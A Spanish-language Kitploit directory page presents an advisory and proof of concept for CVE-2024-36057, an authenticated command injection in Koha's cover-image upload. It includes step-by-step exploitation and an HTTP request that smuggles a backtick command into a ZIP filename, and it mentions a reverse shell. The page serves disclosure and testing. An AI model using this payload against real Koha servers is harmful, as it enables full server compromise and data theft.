Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-36057 — Aviso y prueba de concepto para CVE-2024-36057, una inyección de comandos del sistema operativo autenticada en Koha Library Software, que demuestra la ejecución arbitraria de comandos mediante nombres de archivo ZIP manipulados. | Kitploit
Herramientas/GitHubGitHub/hacklantic/cve-2024-36057
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubhacklantic/cve-2024-36057

CVE-2024-36057

Aviso y prueba de concepto para CVE-2024-36057, una inyección de comandos del sistema operativo autenticada en Koha Library Software, que demuestra la ejecución arbitraria de comandos mediante nombres de archivo ZIP manipulados.

Ver Repositorio
hace 10h 19mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-36057 — Koha Library Software < 22.05.22 — Inyección de Comandos del Sistema Operativo

ID CVE: CVE-2024-36057
Producto: Koha Library Software
Tipo de Vulnerabilidad: Inyección de Comandos del Sistema Operativo (CWE-78)
Puntuación CVSS: 8.7 (Alta) Autenticado
Versiones Afectadas: Inferiores a 22.05.22
Créditos: Karolis Narvilas


Descripción

Koha es un sistema integrado de bibliotecas de código abierto. Existe una vulnerabilidad de inyección de comandos en la funcionalidad de carga de imágenes de portada en tools/upload-cover-image.pl. La aplicación utiliza qx/unzip $filename -d $dirname/ para extraer archivos ZIP cargados sin sanitizar el parámetro del nombre de archivo.

Un usuario autenticado con altos privilegios puede crear un archivo ZIP con un nombre de archivo malicioso que contenga caracteres de comilla invertida para inyectar comandos arbitrarios del shell, que se ejecutan en el servidor cuando el usuario hace clic en "Process Images".

Impacto: Un atacante remoto autenticado puede explotar CVE-2024-36057 para ejecutar comandos arbitrarios del sistema operativo en el servidor subyacente, lo que conduce al compromiso total del sistema, la exfiltración de datos y el establecimiento de puertas traseras persistentes o shells inversos.


Prueba de Concepto (PoC)

  1. Inicie sesión en Koha como usuario con altos privilegios.
  2. Navegue a: https://{domain}/cgi-bin/koha/tools/upload-cover-image.pl
  3. Cargue un archivo ZIP normal y, utilizando un proxy de intercepción como Burp Suite, edite el nombre del archivo como se muestra a continuación:

Solicitud:

root@kitploit:~
POST /cgi-bin/koha/tools/upload-file.pl?temp=1 HTTP/1.1
Host: {domain}
Cookie: [High-Privilege Session]
Connection: close

------WebKitFormBoundaryP82Da5V6eaQOuBUT
Content-Disposition: form-data; name="file"; filename="execute`<INJECTED_COMMAND>`.zip"
Content-Type: application/x-zip-compressed

<zip file contents>
------WebKitFormBoundaryP82Da5V6eaQOuBUT--

  1. Después de que el archivo ZIP se cargue correctamente, haga clic en "Process Images".
  2. El comando inyectado dentro de las comillas invertidas se ejecuta en el servidor. En este ejemplo, se establece un shell inverso en la máquina objetivo.

Reverse Shell PoC


Referencias

  • Koha Community - Release Notes for v22.05.22
  • MITRE - CVE-2024-36057
  • Hacklantic
Descargar herramienta